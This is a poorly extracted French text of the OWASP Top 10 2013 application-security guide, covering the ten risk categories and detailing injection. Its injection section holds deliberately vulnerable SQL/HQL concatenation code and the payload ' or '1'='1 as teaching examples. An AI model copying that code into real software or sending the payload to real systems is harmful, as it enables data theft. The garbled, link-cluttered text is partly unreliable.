5/26/2018 OWASP Top 10 - 2013 - French
1/22
5/26/2018 OWASP Top 10 - 2013 - French
2/22
O A propos de lOWASP
Copyright et Licence
Copyright 20032013 The OWASP Foundation
Ce document est publi sous licence Creative Commons Attribution ShareAlike 3.0. A chrutilisation ou distribution, vous devez en faire clairement apparatre les conditions contractuelles
Prface
Les logiciels non scuriss sapent nos infrastructurescritiques telles la finance, la sant, la dfense, lnergie etautres. Notre infrastructure numrique devenant de plus enplus complexe et interconnecte, la difficult de parvenir une scurit des applications augmente de faonexponentielle. Nous ne pouvons plus nous permettre detolrer les problmes les plus simples comme ceux prsentsdans ce Top 10 OWASP.
Le but de ce projet est de sensibiliser la scurit desapplications en identifiant certain des risques les plus
critiques rencontrs par les entreprise. Ce top 10 estrfrenc par de nombreuses normes, livres, outils etorganisations telles MITRE, PCI DSS, DISA, FTC et biendautres. Cette version du Top 10 OWASP marque la onzimeanne de ce projet de sensibilisation limportance desrisques de scurit des applications. La premire publicationdu Top 10 date de 2003, avec des mises jour mineures en2004 et 2007. La version 2010 a t rorganise afin deprioriser par risque, et non juste par prdominance. Cettedition 2013 suit la mme approche.
Nous vous encourageons utiliser ce Top 10 pour que votre
entreprise entame une dmarche pour la scurit desapplications. Les dveloppeurs peuvent apprendre deserreurs des autres. Les dirigeants devraient commencer rflchir sur la faon de grer le risque que les logicielscrent dans leurs entreprises.
Sur le long terme, nous vous encourageons crer unprogramme de scurit des applications compatible avec laculture et la technologie dentreprise. Ces programmes sontde toutes formes et tailles, et vous devez viter de tenter detout faire en un modle de processus. Au lieu de cela, tirezparti des points forts de votre entreprise et mesurez ce quifonctionne pour vous.
Nous esprons que ce Top 10 est utile vos efforts. N'hsitezpas contacter l'OWASP pour vos questions, commentaireset ides, soit publiquement [email protected] [email protected] priv.
LOWASP
Open Web Application Security Project (OWASP) estcommunaut publique permettant des organismedvelopper, acheter et maintenir des applications fiablOWASP,vous trouverez en accs libre et gratuit
Des normes et des outils de scurit des applications Des livres complets sur les tests de scurit
applications, le dveloppement de code scuris et lde code
Des normes de contrles de scurit et des librairies Des Chapitres locaux dans le monde entier De la recherche de pointe Des confrences travers le monde Des listes de diffusion Et bien plusle tout sur www.owasp.org/ Y compris : www.owasp.org/index.php/Top_10
Laccs tous les outils, documents et forums de lOWAgratuit et ouvert toute personne intresselamlioration de la scurit des applications. prconisons une approche scurit des applications enque problme de personnes, de processus et de technoparce que les approches les plus efficaces pour la scurit
applications ncessitent des amliorations dans toudomaines.
LOWASP est une organisation dun nouveau genre. libert vis--vis des pressions commerciales nous permfournir une information impartiale, pratique et rentablescurit applicative. LOWASP nest lie aucune entretechnologique, bien que nous soutenions l'utilisation cde technologies de scurit commerciale. Semblable nombreux projets logiciels open-source, l'OWASP produnombreux types de supports dans un esprit collaboraouvert.
La Fondation OWASP est lentit but non-lucratif qui ale succs long terme du projet. Presque tous ceux assoOWASP sont volontaires, y compris le Board, les Coglobaux, Chapter Leaders, Chefs de Projets et les MemNous soutenons la recherche de scurit innovante avesubventions et des infrastructures.
Rejoignez nous !
https://www.owasp.org/index.php/Industry:Citationshttps://www.owasp.org/index.php/Industry:Citationsmailto:[email protected]:[email protected]://www.owasp.org/https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/https://www.owasp.org/https://www.owasp.org/https://www.owasp.org/https://www.owasp.org/mailto:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]://www.owasp.org/index.php/Industry:Citationshttps://www.owasp.org/index.php/Industry:Citationshttps://www.owasp.org/index.php/Industry:Citationshttp://creativecommons.org/licenses/by-sa/3.0/5/26/2018 OWASP Top 10 - 2013 - French
3/22
Bienvenue
Bienvenue dans cette dition 2013 du Top 10 de lOWASP!Cette nouvelle version introduit deux catgories tendues par ra
la version 2010 afin d'inclure d'importantes vulnrabilits. Elle propose galement une rorganisation des risques, basleur prvalence. Enfin, une nouvelle catgorie de risque voit le jour: la scurit des composants tiers. Ces risques, rfrenc A6Mauvaise configuration scurit dans la version 2010, ont dsormais une catgorie ddie.
Le Top 10 2013 de l'OWASP est bas sur 8 jeux de donnes de 7 entreprises spcialises dans la scurit des applications, dsocits de conseil et 3 fournisseurs d'outils ou de services SaaS (1 statique, 1 dynamique et 1 statique et dynamiquedonnes couvrent plus 500 000 vulnrabilits travers des centaines d'organisations et des milliers d'applications. Lecatgories de risques couvertes par le Top 10 sont slectionnes et hirarchises en fonction de leur frquence, deexploitabilit, de leur dtectabilit et de leurs impacts potentiels.
Lobjectif principal du Top 10 de lOWASP est de sensibiliser les dveloppeurs, concepteurs, architectes, dcideurs, entreprises aux consquences des faiblesses les plus importantes inhrentes la scurit des applications web. Le Top 10 fo
des techniques de base pour se protger contre ces domaines problmatiques haut risque et fournit des conseils direction suivre.
Avertissements
Ne vous arrtez pas 10! Il y a des centaines de problmesqui pourraient influer sur la scurit globale duneapplication web comme indiqu dans le Guide dudveloppeur de lOWASP et la srie des OWASP CheatSheets. Ce se sont des lectures essentielles pour quiconquedveloppe des applications web. Des conseils sur la manire
de trouver des vulnrabilits dans les applications web sontfournis dans le Guide de Testet le Guide dauditde Code.
Changement constant. Ce Top 10 voluera dans le temps.Mme sans modifier une seule ligne de code de votreapplication, cette dernire peut dj tre vulnrable uneattaque laquelle personne na pens auparavant. Veuillezprendre connaissance des conseils la fin de ce documentdans les sections relatives aux dveloppeurs, vrificateurs etentreprises pour plus dinformation.
Pensez positif! Quand vous serez prt arrter de chasser
les vulnrabilits et vous concentrer sur ltablissementdecontrles solides de scurit des applications, lOWASP apubli le Standard de Vrification de Scurit Applicative(ASVS) comme guide pour les entreprises et les auditeursdapplicationssur ce quilfaut vrifier.
Utilisez les outils sagement! Les failles de scurit peuventtre complexes et enfouies dans le code source. Dans laplupart des cas, lapproche la plus rentable pour trouver etliminer ces faiblesses reste lhumaindot de bons outils.
Allez plus loin!Faites de la scurit une partie intgrante dela culture de votre entreprise. Pour en savoir plus, consultezOpen Software Assurance Maturity Model (SAMM) etRugged Handbook.
Remerciements
Nos remerciements Aspect Security pour avoir initi, pet mis jour le Top 10 de lOWASP depuis sa cration en
et ses principaux auteurs: Jeff Williams et Dave Wichers
Nous voudrions remercier les entreprises qui ont contribusupporter la mise jour 2013 en fournissant leur donnela frquence des vulnrabilits:
Aspect Security HP(rsultats issus des produits Fortifyet WebInsp Minded Security- Statistiques Softtek- Statistiques TrustWave, SpiderLabsStatistiques(voir page 50 VeracodeStatistiques WhiteHat Security Inc.Statistiques
Nous tenons galement remercier toutes les personnesayant contribu aux versions prcdentes du Top 10, sanlesquelles , il ne serait pas ce quil est aujourdhui. Sans o
ceux ayant contribu par leur contenu significatif ou larelecture de cette version 2013:
Adam Baso (Wikimedia Foundation) Mike Boberski (Booz Allen Hamilton) Torsten Gigler Neil Smithline (MorphoTrust USA)pour la version
et ses commentaires.
I Introduction
https://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/Cheat_Sheetshttps://www.owasp.org/index.php/Cheat_Sheetshttps://www.owasp.org/index.php/Category:OWASP_Testing_Projecthttps://www.owasp.org/index.php/Category:OWASP_Code_Review_Projecthttps://www.owasp.org/index.php/Category:OWASP_Code_Review_Projecthttps://www.owasp.org/index.php/Category:OWASP_Code_Review_Projecthttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttp://ruggedsoftware.org/https://www.aspectsecurity.com/https://www.aspectsecurity.com/http://www.hpenterprisesecurity.com/http://www.hpenterprisesecurity.com/collateral/whitepaper/HP2012CyberRiskReport_0313.pdfhttp://www.mindedsecurity.com/http://blog.mindedsecurity.com/2013/02/real-life-vulnerabilities-statistics.htmlhttp://www.softtek.com/https://www.softtek.com/webdocs/special_pdfs/WP-State-of-the-art-2013.pdfhttps://www.trustwave.com/spiderlabs/http://www2.trustwave.com/rs/trustwave/images/2013-Global-Security-Report.pdfhttp://www.veracode.com/http://info.veracode.com/rs/veracode/images/VERACODE-SOSS-V4.PDFhttps://www.whitehatsec.com/http://owasptop10.googlecode.com/files/WPstats_winter11_11th.pdfhttps://www.trustwave.com/https://www.trustwave.com/http://owasptop10.googlecode.com/files/WPstats_winter11_11th.pdfhttps://www.whitehatsec.com/http://info.veracode.com/rs/veracode/images/VERACODE-SOSS-V4.PDFhttp://www.veracode.com/http://www2.trustwave.com/rs/trustwave/images/2013-Global-Security-Report.pdfhttps://www.trustwave.com/spiderlabs/https://www.trustwave.com/spiderlabs/https://www.softtek.com/webdocs/special_pdfs/WP-State-of-the-art-2013.pdfhttp://www.softtek.com/http://blog.mindedsecurity.com/2013/02/real-life-vulnerabilities-statistics.htmlhttp://www.mindedsecurity.com/http://www.mindedsecurity.com/http://www.mindedsecurity.com/http://www.hpenterprisesecurity.com/collateral/whitepaper/HP2012CyberRiskReport_0313.pdfhttp://www.hpenterprisesecurity.com/https://www.aspectsecurity.com/https://www.aspectsecurity.com/http://ruggedsoftware.org/http://ruggedsoftware.org/http://ruggedsoftware.org/https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Modelhttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/Category:OWASP_Code_Review_Projecthttps://www.owasp.org/index.php/Category:OWASP_Code_Review_Projecthttps://www.owasp.org/index.php/Category:OWASP_Code_Review_Projecthttps://www.owasp.org/index.php/Category:OWASP_Code_Review_Projecthttps://www.owasp.org/index.php/Category:OWASP_Code_Review_Projecthttps://www.owasp.org/index.php/Category:OWASP_Code_Review_Projecthttps://www.owasp.org/index.php/Category:OWASP_Code_Review_Projecthttps://www.owasp.org/index.php/Category:OWASP_Testing_Projecthttps://www.owasp.org/index.php/Category:OWASP_Testing_Projecthttps://www.owasp.org/index.php/Category:OWASP_Testing_Projecthttps://www.owasp.org/index.php/Category:OWASP_Testing_Projecthttps://www.owasp.org/index.php/Category:OWASP_Testing_Projecthttps://www.owasp.org/index.php/Cheat_Sheetshttps://www.owasp.org/index.php/Cheat_Sheetshttps://www.owasp.org/index.php/Cheat_Sheetshttps://www.owasp.org/index.php/Cheat_Sheetshttps://www.owasp.org/index.php/Cheat_Sheetshttps://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/OWASP_Guide_Projecthttps://www.owasp.org/index.php/OWASP_Guide_Project5/26/2018 OWASP Top 10 - 2013 - French
4/22
Ce qui a chang de 2010 2013
Le paysage des menaces des applications de scurit volue constamment. Les facteurs cl de cette volution sont les prraliss par les attaquants, lmergence de nouvelles technologies avec de nouvelles faiblesses, ainsi que des dfensesintgres, et le dploiement de systmes de plus en plus complexes. Pour suivre le rythme, nous mettons priodiquement le Top 10 de l'OWASP. Dans cette version 2013, nous avons apport les modifications suivantes:
1) La violation de gestion dauthentificationet de session est plus rpandue selon notre chantillon. Nous pensons queprobablement du au fait que ce domaine est plus tudi, et non du fait de problmes plus rpandus. Les risques A2 changent donc de place.
2) La falsification de requte intersites (CSRF), prdominance moins rpandue dans notre rfrentiel, rtrograde de 20 2013-A8. Nous pensons que les entreprises et les dveloppeurs ont significativement rduit le nombre de vulnraCSRF dans leurs applications du fait de sa prsence dans le Top 10 OWASP depuis 6 ans.
3) Nous avons largi le Manque de restriction daccs une URL du Top 10 dOWASP2010 afin dtreplus complet:
+ 2010-A8: Manque de restriction daccs une URL est dsormais, 2013-A7: Manque de contrle daccs au nfonctionnelpour couvrir tous les contrles daccsau niveau fonctionnel. Il existe de nombreuses manires de dquelle fonctionnalit doit tre accde, pas seulement lURL.
4) Nous avons fusionn et largi 2010-A7 et 2010-A9 pour CREER: 2013-A6: Exposition de donnes sensibles.
Cette nouvelle catgorie a t cre en fusionnant 2010-A7 Stockage cryptographique non scuris & 2010Protection insuffisante de la couche de transport, en y ajoutant le risque de donnes sensibles au niveau du navigaCette nouvelle catgorie couvre la protection des donnes sensibles (autre que le contrle daccs dj couve2013-A4 et 2013-A7) partir du moment o les donnes sensibles sont fournies par lutilisateur,transmises et stodans lapplication,et renvoyes ensuite au navigateur.
5) Nous avons ajout: 2013-A9: Utilisation de composants avec des vulnrabilits connues:
+ Ce problme a t mentionn comme faisant partie de 2010-A6Mauvaise configuration de scurit, mais pomaintenant une catgorie part entire du fait de la croissance rapide du dveloppement base de composants significativement augment le risque dutilisationde composants connus comme vulnrables
OWASP Top 102010 (Prcdent) OWASP Top 102013 (Nouvea
A1Injection A1Injection
A3Violation de Gestion dauthentification et de SessionA2Violation de Gestion dauthentification et deSession
A2Cross-Site Scripting (XSS) A3Cross-Site Scripting (XSS)
A4Rfrences directes non scurises un objet A4Rfrences directes non scurises un objet
A6Mauvaise configuration scurit A5Mauvaise configuration scurit
A7Stockage cryptographique non scurisFusionn avec A9 A6Exposition de donnes sensibles
A8Manque de restriction daccs une URL Elargie dans A7Manque de contrle daccs au niveau fonctio
A5Falsification de requte intersites (CSRF) A8Falsification de requte intersites (CSRF)
A9Utilisation de composants avec des vulnrabiconnues
A10Redirection et Renvois non valids A10 Redirection et Renvois non valids
Notes de versionRN
5/26/2018 OWASP Top 10 - 2013 - French
5/22
Risques de scurit applicatiRisque
RfrencesOWASP
Mthodologie dvaluation des riOWASP
Article sur la modlisation MenacRisque
Externes
Analyse de s risques de linformatFAIR
Modlisation des menaces Micro(STRIDE et DREAD)
Quel est Mon Risque?Le Top 10 OWASP se concentre sur l'identification des risques les plus graves pourun large ventail dentreprises. Pour chacun de ces risques, nous fournissons desinformations gnrales sur la probabilit et limpact technique en utilisant leschma dvaluation des risques suivant, qui est bas sur la Mthodologiedvaluationdes risques OWASP.
Vous seul connaissez les caractristiques de votre environnement et de votremtier. Pour une application donne, il ny a peut-tre pas dagent de menacepouvant raliser un type dattaque, ou il peut ny avoir aucun impact technique.Cest pourquoi vous devez valuer chaque risque pour vous-mme, en vousconcentrant sur les agents de menace, contrles de scurit et impacts mtiersrelatifs votre votre entreprise. Nous classons les agents de menace commespcifiques aux applications, et les impacts mtiers comme spcifiques auxapplications ou au mtier pour indiquer quils sont clairement dpendants desdtails de lapplicationdans votre entreprise.
Le nom des risques dans le Top 10 dcoule du type dattaque,du type de faiblesse,ou du type dimpactquilpeut causer. Nous choisissons des noms qui refltent lesrisque de manire prcise, et, quand cela est possible, nous nous alignons sur laterminologie la plus rpandue pour assurer la meilleure sensibilisation.
Quels sont les Risques de Scurit des Applications?
Les attaquants peuvent potentiellement utiliser diffrents chemins travers votre application pour porter atteinte votre mou votre entreprise. Chacun de ces chemins reprsente un risque qui peut, ou pas, tre suffisamment grave pour mriter attention.
Parfois, ces chemins sont faciles trouver et exploiter, et parfois ils sont extrmement difficiles. De mme, le prjudice peut navoiraucune consquence, ou faire cesser votre activit. Pour dterminer le risque pour votre entreprise, vous pvaluer la probabilit relative chaque agent de menace, vecteur dattaque,et vulnrabilit et les combiner avec une estimdimpacttechnique et financier pour votre entreprise. Ensembles, ces facteurs dterminent le risque global.
Bien
Attaque Contrle
ImpacAttaque
Contrle
Fonction
ImpacVulnrabilit
Vulnrabilit
Attaque Vulnrabilit
Vulnrabilit Contrle
Bien
Impac
Agents deMenace
VecteursdAttaque
Vulnrabilits Contrles deScurit
ImpactsTechniques
ImpacMtie
Agent de
menace
Vecteurs
dattaque
Prvalence
de la
vulnrabilit
Dtection de
la
vulnrabilit
Impact
TechniqueImpact Mtier
Spcifique
lApplication
Facile Trs rpandue Facile Svre
Spcifiques lApplication
ou au Mtier
Moyen Commune Moyen Modr
Difficile Rare Difficile Mineur
http://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/Threat_Risk_Modelinghttps://www.owasp.org/index.php/Threat_Risk_Modelinghttps://www.owasp.org/index.php/Threat_Risk_Modelinghttp://www.owasp.org/index.php/Command_Injectionhttp://fairwiki.riskmanagementinsight.com/http://fairwiki.riskmanagementinsight.com/http://fairwiki.riskmanagementinsight.com/http://msdn.microsoft.com/en-us/library/aa302419.aspxhttp://msdn.microsoft.com/en-us/library/aa302419.aspxhttps://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10https://www.owasp.org/index.php/Top_10http://msdn.microsoft.com/en-us/library/aa302419.aspxhttp://msdn.microsoft.com/en-us/library/aa302419.aspxhttp://msdn.microsoft.com/en-us/library/aa302419.aspxhttp://msdn.microsoft.com/en-us/library/aa302419.aspxhttp://fairwiki.riskmanagementinsight.com/http://fairwiki.riskmanagementinsight.com/http://fairwiki.riskmanagementinsight.com/http://fairwiki.riskmanagementinsight.com/http://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Threat_Risk_Modelinghttps://www.owasp.org/index.php/Threat_Risk_Modelinghttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttps://www.owasp.org/index.php/OWASP_Risk_Rating_Methodologyhttp://www.owasp.org/index.php/Command_Injection5/26/2018 OWASP Top 10 - 2013 - French
6/22
Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donne non fest envoye un interprteur en tant qu'lment d'une commande ou d'une requtedonnes hostiles de l'attaquant peuvent duper l'interprteur afin de l'amener excutercommandes fortuites ou accder des donnes non autorises.
A1Injection
Les fonctions applicatives relatives l'authentification et la gestion de session ne sont soupas mises en uvre correctement, permettant aux attaquants de compromettre les motpasse, cls, jetons de session, ou d'exploiter d'autres failles d'implmentation pour s'approles identits d'autres utilisateurs.
A2Violation deGestion
d'Authentificationet de Session
Les failles XSS se produisent chaque fois qu'une application accepte des donnes non fiablles envoie un browser web sans validation approprie. XSS permet des attaquants d'excdu script dans le navigateur de la victime afin de dtourner des sessions utilisateur, dfigurersites web, ou rediriger l'utilisateur vers des sites malveillants.
A3Cross-SiteScripting (XSS)
Une rfrence directe un objet se produit quand un dveloppeur expose une rfrence objet d'excution interne, tel un fichier, un dossier, un enregistrement de base de donneune cl de base de donnes. Sans un contrle d'accs ou autre protection, les attaquants peumanipuler ces rfrences pour accder des donnes non autorises.
A4Rfrencesdirectes non
scurises unobjet
Une bonne scurit ncessite de disposer d'une configuration scurise dfinie et dploye l'application, contextes, serveur d'application, serveur web, serveur de base de donnes plate-forme. Tous ces paramtres doivent tre dfinis, mis en uvreet maintenus, car beaune sont pas livrs scuriss par dfaut. Cela implique de tenir tous les logiciels jour.
A5Mauvaiseconfiguration
Scurit
Beaucoup d'applications web ne protgent pas correctement les donnes sensibles telles qucartes de crdit, identifiants d'impt et informations d'authentification. Les pirates peuvent vou modifier ces donnes faiblement protges pour effectuer un vol d'identit, de la fraudecarte de crdit ou autres crimes. Les donnes sensibles mritent une protection supplmenttel un chiffrement statique ou en transit, ainsi que des prcautions particulires lors de l'chavec le navigateur.
A6Exposition dedonnes sensibles
Pratiquement toutes les applications web vrifient les droits d'accs au niveau fonctionnel ade rendre cette fonctionnalit visible dans l'interface utilisateur. Cependant, les applicatdoivent effectuer les mmes vrifications de contrle d'accs sur le serveur lors de l'accchaque fonction. Si les demandes ne sont pas vrifies, les attaquants seront en mesure de fodes demandes afin d'accder une fonctionnalit non autorise.
A7Manque decontrle daccsauniveau fonctionnel
Une attaque CSRF (Cross Site Request Forgery) force le navigateur d'une victime authentifenvoyer une requte HTTP forge, comprenant le cookie de session de la victime ainsi que tautre information automatiquement inclue, une application web vulnrable. Ceci perml'attaquant de forcer le navigateur de la victime gnrer des requtes dont l'applicavulnrable pense qu'elles manent lgitimement de la victime.
A8 - Falsification derequte intersite
(CSRF)
Les composants vulnrables, tels que bibliothques, contextes et autres modules logfonctionnent presque toujours avec des privilges maximum. Ainsi, si exploits, ils peuvent cades pertes de donnes srieuses ou une prise de contrle du serveur. Les applications utilces composants vulnrables peuvent compromettre leurs dfenses et permettre une d'attaques et d'impacts potentiels.
A9 - Utilisation decomposants avecdes vulnrabilits
connues
Les applications web rorientent et redirigent frquemment les utilisateurs vers d'autres pag
sites internet, et utilisent des donnes non fiables pour dterminer les pages de destination. validation approprie, les attaquants peuvent rorienter les victimes vers des sites de phishinde malware, ou utiliser les renvois pour accder des pages non autorises.
A10Redirectionset renvois non
valids
OWASP Top 10 2013Risques Scurit des ApplicationT10
5/26/2018 OWASP Top 10 - 2013 - French
7/22
SpcifiqueApplication
ExploitabilitFACILE
PrvalenceCOMMUNE
DtectionMOYENNE
ImpactSEVERE
SpcifiquApplication/M
Considrez quenimporte qui peutenvoyer desdonnes non fiablesau systme, ycompris lesutilisateursexternes, internes,et administrateurs.
Lattaquant utilisedes scripts quiexploitent lasyntaxe duninterprteur cible.Presque toutesource de donnespeut tre unvecteur dinjection,y compris des
sources internes.
Les failles dInjectionsurviennent quandune application envoie des donnes nonfiable un interprteur. Les faillesdinjection sont trs frquentes, surtoutdans un code ancien. On les retrouvesouvent en SQL, LDAP, XPath, ou NoSQL;commandes OS; parseurs XML; enttesSMTP, arguments de programme, etc. Lesfailles dInjection se dtectent facilementvia le code, difficilement via le test.
Scanners et Fuzzers peuvent aider lesattaquants trouver les failles dInjection.
LInjectionpeutrsulter en uneperte ou unecorruption dedonnes, une pertede droits, ou unrefus daccs.LInjection peutparfois mener uneprise de contrle
totale du serveur.
Considrez la mtier de la dimpacte et laplateformeexcutantlinterprteurToute donnepourrait tre vmodifie ousupprime. Vo
rputation poelle en ptir?
Exemple de scnarios dattaque
Scnario #1: Une application utilise des donnes non fiablesdans la construction de lappelSQL vulnrable suivant:
String query = "SELECT * FROM accounts WHEREcustID='" + request.getParameter("id") +"'";
Scnario #2: Pareillement, la confiance aveugle duneapplication aux frameworks peut dboucher sur des requtestoujours vulnrables (p.ex. Hibernate Query Language (HQL)):
Query HQLQuery = session.createQuery(FROM accountsWHERE custID='+ request.getParameter("id") + "'");
Dans les deux cas, lattaquantmodifie le paramtre iddansson navigateur et envoie: ' or '1'='1. Par exemple:
http://example.com/app/accountView?id=' or '1'='1
Le sens des deux requtes est modifi pour retourner toutesles lignes de la table accounts. Les pires attaques peuventaltrer des donnes, voire invoquer des procdures stockes.
Suis-je vulnrable?Le meilleur moyen de savoir si une application est vulnrable lInjection est de vrifier que toute utilisationdinterprteursspare explicitement les donnes non fiablesde la commande ou de la requte. Pour les appels SQL, celasignifie utiliser des variables lies dans toutes les instructionsprpares et procdures stockes, et viter les requtesdynamiques.
Vrifier le code est un moyen rapide et adquat poursassurerque lapplicationutilise sainement les interprteurs.Les outils danalysede code peuvent aider localiser lusagedes interprteurs et tracer leur flux de donnes traverslapplication. Les Pentesters peuvent valider ces problmesen concevant des exploits qui confirment la vulnrabilit.
Le scan dynamique peut donner un aperu des faillesdInjection existantes. Les scanners ne savent pas toujoursatteindre les interprteurs, ni si une attaque a russi. Unemauvaise gestion derreuraide trouver les failles.
Rfrences
OWASPOWASP SQL Injection Prevention Cheat Sheet
OWASP Query Parameterization Cheat Sheet
OWASP Command Injection Article
OWASP XML eXternal Entity (XXE) Reference Article
ASVS: Output Encoding/Escaping Requirements (V6)
OWASP Testing Guide: Chapter on SQL Injection Testing
Externes
CWE Entry 77 on Command Injection
CWE Entry 89 on SQL Injection
CWE Entry 564 on Hibernate Injection
Comment senprmunir?Empcher une Injection exige de sparer les donnefiables des commandes et requtes.
1. La meilleure option est dutiliser une API saine toute utilisation de linterprteur ou fournissaninterface paramtrable. Attention aux APIs telles qprocdures stockes qui, bien que paramtrpeuvent envelopper une Injection.
2. En labsence dAPI paramtrable, vous dsoigneusement chapper les caractres spciauutilisant la syntaxe dchappement spcifiqulinterprteur. OWASPs ESAPI fournit des rodchappement.
3. La whitelist est recommande pour validedonnes entrantes, mais nestpas une dfense complusieurs applications requrant des caractres sple cas chant, seules les approches 1. et 2. scurOWASPs ESAPIa une librairie extensible de routinvalidation whitelist dentres.
A1 InjectionVulnrabilit
Vecteursdattaque
ImpactsTechniqueAgents de menace
ImpactsMtier
http://www.owasp.org/index.php/Injection_Flawshttp://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttps://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheethttps://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/XXEhttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)http://www.owasp.org/index.php/Command_Injectionhttp://cwe.mitre.org/data/definitions/77.htmlhttp://cwe.mitre.org/data/definitions/89.htmlhttp://cwe.mitre.org/data/definitions/564.htmlhttps://www.owasp.org/index.php/ESAPIhttps://www.owasp.org/index.php/ESAPIhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.htmlhttps://www.owasp.org/index.php/ESAPIhttps://www.owasp.org/index.php/ESAPIhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.htmlhttps://www.owasp.org/index.php/ESAPIhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.htmlhttp://owasp-esapi-java.googlecod